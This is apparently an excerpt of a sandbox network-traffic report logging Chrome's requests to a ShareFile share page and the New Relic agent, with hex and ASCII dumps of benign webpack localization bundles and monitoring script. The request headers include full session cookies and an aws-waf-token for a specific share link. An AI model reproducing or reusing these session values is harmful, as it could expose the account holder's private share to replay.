                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC8460INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 38 36 5d 2c 7b 32 39 32 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 46 69 6c 65 5f 68 61 73 5f 6d 75 6c 74 69 70 6c 65 5f 76 65 72 73 69 6f 6e 73 22 3a 22 46 69 6c 65 20 68 61 73 20 6d 75 6c 74 69 70 6c 65 20 76 65 72 73 69 6f 6e 73 22 2c 22 46 69 6c 65 5f 68 61 73 5f 72 65 73 74 72 69 63 74 65 64 5f 61 63
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[9286],{29286:function(e){e.exports=JSON.parse('{"File_has_multiple_versions":"File has multiple versions","File_has_restricted_ac
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC16384INData Raw: 22 43 6f 70 79 22 2c 22 63 6f 70 79 5f 64 69 61 6c 6f 67 22 3a 7b 22 69 74 65 6d 5f 69 6e 66 6f 31 6f 66 32 22 3a 22 43 6f 70 79 69 6e 67 20 5c 5c 22 7b 7b 66 69 6c 65 4e 61 6d 65 7d 7d 5c 5c 22 20 74 6f 20 5c 5c 22 22 2c 22 69 74 65 6d 5f 69 6e 66 6f 31 6f 66 32 5f 70 6c 75 72 61 6c 22 3a 22 43 6f 70 79 69 6e 67 20 7b 7b 63 6f 75 6e 74 7d 7d 20 69 74 65 6d 73 20 74 6f 20 5c 5c 22 22 2c 22 69 74 65 6d 5f 6d 65 73 73 61 67 65 32 6f 66 32 22 3a 22 5c 5c 22 2e 22 2c 22 69 74 65 6d 5f 6d 65 73 73 61 67 65 32 6f 66 32 5f 70 6c 75 72 61 6c 22 3a 22 5c 5c 22 2e 22 2c 22 69 74 65 6d 5f 73 75 63 63 65 73 73 31 6f 66 32 22 3a 22 5c 5c 22 7b 7b 66 69 6c 65 4e 61 6d 65 7d 7d 5c 5c 22 20 77 61 73 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 63 6f 70 69 65 64 20 74 6f 20
                                                                                                                                                                                                                      Data Ascii: "Copy","copy_dialog":{"item_info1of2":"Copying \\"{{fileName}}\\" to \\"","item_info1of2_plural":"Copying {{count}} items to \\"","item_message2of2":"\\".","item_message2of2_plural":"\\".","item_success1of2":"\\"{{fileName}}\\" was successfully copied to
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC10506INData Raw: 3a 22 54 68 69 73 20 66 6c 61 67 20 69 73 20 6d 6f 73 74 20 73 75 69 74 65 64 20 66 6f 72 20 63 6f 6d 6d 6f 6e 20 6f 72 20 69 6d 70 6f 72 74 61 6e 74 20 71 75 65 73 74 69 6f 6e 73 2e 20 20 53 74 69 63 6b 79 20 71 75 65 73 74 69 6f 6e 73 20 77 69 6c 6c 20 64 69 73 70 6c 61 79 20 61 74 20 74 68 65 20 74 6f 70 20 6f 66 20 74 68 65 20 6c 69 73 74 20 6f 66 20 71 75 65 73 74 69 6f 6e 73 2e 22 2c 22 73 75 62 6d 69 74 22 3a 22 53 75 62 6d 69 74 22 2c 22 75 6e 61 6e 73 77 65 72 65 64 5f 71 75 65 73 74 69 6f 6e 5f 65 6d 70 74 79 5f 6d 65 73 73 61 67 65 22 3a 22 41 6c 6c 20 71 75 65 73 74 69 6f 6e 73 20 68 61 76 65 20 62 65 65 6e 20 61 6e 73 77 65 72 65 64 2e 22 2c 22 75 6e 61 6e 73 77 65 72 65 64 5f 71 75 65 73 74 69 6f 6e 5f 74 61 62 5f 74 69 74 6c 65 22 3a 22 55
                                                                                                                                                                                                                      Data Ascii: :"This flag is most suited for common or important questions. Sticky questions will display at the top of the list of questions.","submit":"Submit","unanswered_question_empty_message":"All questions have been answered.","unanswered_question_tab_title":"U


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      133192.168.2.175360176.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1600OUTGET /bundles/c3b78c86faf44765071f.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1428INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:27 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 972
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2c4c"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC972INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 31 33 35 5d 2c 7b 39 33 31 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 46 69 6c 65 44 72 6f 70 22 3a 7b 22 63 68 6f 6f 73 65 5f 72 65 63 69 70 69 65 6e 74 22 3a 22 43 68 6f 6f 73 65 20 52 65 63 69 70 69 65 6e 74 22 2c 22 63 6c 65 61 72 22 3a 22 63 6c 65 61 72 22 2c 22 72 65 63 69 70 69 65 6e 74 22 3a 22 52 65
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[3135],{93135:function(e){e.exports=JSON.parse('{"FileDrop":{"choose_recipient":"Choose Recipient","clear":"clear","recipient":"Re


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      134192.168.2.175360076.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1600OUTGET /bundles/e0aa737e437fa075dfed.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1430INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:27 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 25648
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c4bb0"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC14954INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 39 36 5d 2c 7b 37 33 39 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 43 6f 6e 66 69 72 6d 44 69 61 6c 6f 67 22 3a 7b 22 63 61 6e 63 65 6c 22 3a 22 43 61 6e 63 65 6c 22 2c 22 63 6f 6e 74 69 6e 75 65 22 3a 22 43 6f 6e 74 69 6e 75 65 22 2c 22 63 6f 6e 74 69 6e 75 65 5f 61 6e 79 77 61 79 22 3a 22 43 6f 6e 74 69
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[3996],{73996:function(e){e.exports=JSON.parse('{"ConfirmDialog":{"cancel":"Cancel","continue":"Continue","continue_anyway":"Conti
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC10694INData Raw: 65 6e 63 72 79 70 74 65 64 20 65 6d 61 69 6c 22 2c 22 72 65 71 75 65 73 74 5f 66 69 6c 65 73 22 3a 22 48 6f 77 20 74 6f 20 72 65 71 75 65 73 74 20 66 69 6c 65 73 22 2c 22 73 65 63 75 72 65 6c 79 5f 73 68 61 72 65 5f 6c 69 6e 6b 73 5f 74 6f 5f 66 69 6c 65 73 22 3a 22 48 6f 77 20 74 6f 20 73 65 63 75 72 65 6c 79 20 73 68 61 72 65 20 6c 69 6e 6b 73 20 74 6f 20 66 69 6c 65 73 22 2c 22 73 68 61 72 65 5f 61 5f 66 69 6c 65 22 3a 22 48 6f 77 20 74 6f 20 73 68 61 72 65 20 61 20 66 69 6c 65 22 2c 22 73 68 61 72 65 5f 61 5f 66 69 6c 65 5f 76 69 61 5f 6c 69 6e 6b 22 3a 22 48 6f 77 20 74 6f 20 73 68 61 72 65 20 61 20 66 69 6c 65 20 76 69 61 20 6c 69 6e 6b 22 2c 22 75 70 6c 6f 61 64 5f 61 5f 66 69 6c 65 22 3a 22 48 6f 77 20 74 6f 20 75 70 6c 6f 61 64 20 61 20 66 69 6c
                                                                                                                                                                                                                      Data Ascii: encrypted email","request_files":"How to request files","securely_share_links_to_files":"How to securely share links to files","share_a_file":"How to share a file","share_a_file_via_link":"How to share a file via link","upload_a_file":"How to upload a fil


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      135192.168.2.1753608162.247.243.394437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC503OUTGET /nr-spa-1216.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js-agent.newrelic.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 50049
                                                                                                                                                                                                                      Last-Modified: Wed, 18 Oct 2023 21:31:16 GMT
                                                                                                                                                                                                                      ETag: "63e2df852d15ab21d7ff8fc4363222e8"
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=86400, stale-if-error=86400
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      X-Served-By: cache-dfw-kdal2120132-DFW
                                                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=300
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6f 29 7b 69 66 28 21 6e 5b 65 5d 29 7b 69 66 28 21 74 5b 65 5d 29 7b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 6e 72 5f 72 65 71 75 69 72 65 26 26 5f 5f 6e 72 5f 72 65 71 75 69 72 65 3b 69 66 28 21 6f 26 26 61 29 72 65 74 75 72 6e 20 61 28 65 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 65 2c 21 30 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 7d 76 61 72 20 73 3d 6e 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 65 5d 5b 30 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76
                                                                                                                                                                                                                      Data Ascii: !function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){v
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 6e 3a 74 2c 6d 61 78 3a 74 2c 73 6f 73 3a 74 2a 74 2c 63 3a 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 6e 2c 65 2c 72 29 7b 67 5b 74 5d 7c 7c 28 67 5b 74 5d 3d 7b 7d 29 3b 76 61 72 20 69 3d 67 5b 74 5d 5b 6e 5d 3b 72 65 74 75 72 6e 20 69 7c 7c 28 69 3d 67 5b 74 5d 5b 6e 5d 3d 7b 70 61 72 61 6d 73 3a 65 7c 7c 7b 7d 7d 2c 72 26 26 28 69 2e 63 75 73 74 6f 6d 3d 72 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 67 5b 74 5d 26 26 67 5b 74 5d 5b 6e 5d 3a 67 5b 74 5d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 7b 7d 2c 65 3d 22 22 2c 72 3d 21 31 2c 69 3d 30 3b 69 3c 74 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 65 3d 74 5b 69 5d 2c 6e 5b 65 5d 3d 70 28 67 5b 65 5d 29 2c 6e 5b 65 5d 2e 6c 65
                                                                                                                                                                                                                      Data Ascii: n:t,max:t,sos:t*t,c:1}}function d(t,n,e,r){g[t]||(g[t]={});var i=g[t][n];return i||(i=g[t][n]={params:e||{}},r&&(i.custom=r)),i}function l(t,n){return n?g[t]&&g[t][n]:g[t]}function h(t){for(var n={},e="",r=!1,i=0;i<t.length;i++)e=t[i],n[e]=p(g[e]),n[e].le
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 32 30 30 29 29 7d 76 61 72 20 64 3d 74 28 31 39 29 2c 6c 3d 74 28 31 30 29 2c 68 3d 74 28 32 29 2c 70 3d 74 28 32 31 29 2c 6d 3d 74 28 32 35 29 2c 76 3d 74 28 35 32 29 2c 67 3d 74 28 22 6c 6f 61 64 65 72 22 29 2c 79 3d 74 28 22 68 61 6e 64 6c 65 22 29 2c 78 3d 74 28 34 35 29 2c 77 3d 74 28 34 39 29 2c 62 3d 30 2c 54 3d 78 2e 67 65 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 28 22 73 73 6c 22 29 3d 3d 3d 21 31 3f 22 68 74 74 70 22 3a 22 68 74 74 70 73 22 3b 6c 2e 6f 6e 28 22 6a 73 65 72 72 6f 72 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 62 6f 64 79 3a 68 2e 74 61 6b 65 28 5b 22 63 6d 22 2c 22 73 6d 22 5d 29 7d 7d 29 2c 64 28 22 73 74 6f 72 65 4d 65 74 72 69 63 22 2c 72 2c 22 61 70 69 22 29 2c 64 28 22 73 74 6f 72 65 45 76 65 6e 74 4d 65
                                                                                                                                                                                                                      Data Ascii: 200))}var d=t(19),l=t(10),h=t(2),p=t(21),m=t(25),v=t(52),g=t("loader"),y=t("handle"),x=t(45),w=t(49),b=0,T=x.getConfiguration("ssl")===!1?"http":"https";l.on("jserrors",function(){return{body:h.take(["cm","sm"])}}),d("storeMetric",r,"api"),d("storeEventMe
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 2f 2c 69 3d 2f 28 5b 5e 3f 23 5d 2a 29 28 29 2e 2a 2f 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 6e 3f 72 3a 69 2c 22 24 31 24 32 22 29 7d 7d 2c 7b 7d 5d 2c 36 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 5b 31 5d 3b 6f 28 6e 5b 65 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 76 61 72 20 72 3d 74 5b 30 5d 2c 69 3d 65 5b 30 5d 3b 69 66 28 69 3d 3d 3d 72 29 7b 76 61 72 20 6f 3d 65 5b 31 5d 2c 61 3d 74 5b 33 5d 2c 73 3d 74 5b 32 5d 3b 6f 2e 61 70 70 6c 79 28 61 2c 73 29 7d 7d 29 7d 76 61 72 20 69 3d 74 28 22 65 65 22 29 2c 6f 3d 74 28 35 32 29 2c 61 3d 74 28 31 39 29 2e 68 61 6e 64 6c 65 72 73 3b
                                                                                                                                                                                                                      Data Ascii: /,i=/([^?#]*)().*/;n.exports=function(t,n){return t.replace(n?r:i,"$1$2")}},{}],6:[function(t,n,e){function r(t,n){var e=t[1];o(n[e],function(n,e){var r=t[0],i=e[0];if(i===r){var o=e[1],a=t[3],s=t[2];o.apply(a,s)}})}var i=t("ee"),o=t(52),a=t(19).handlers;
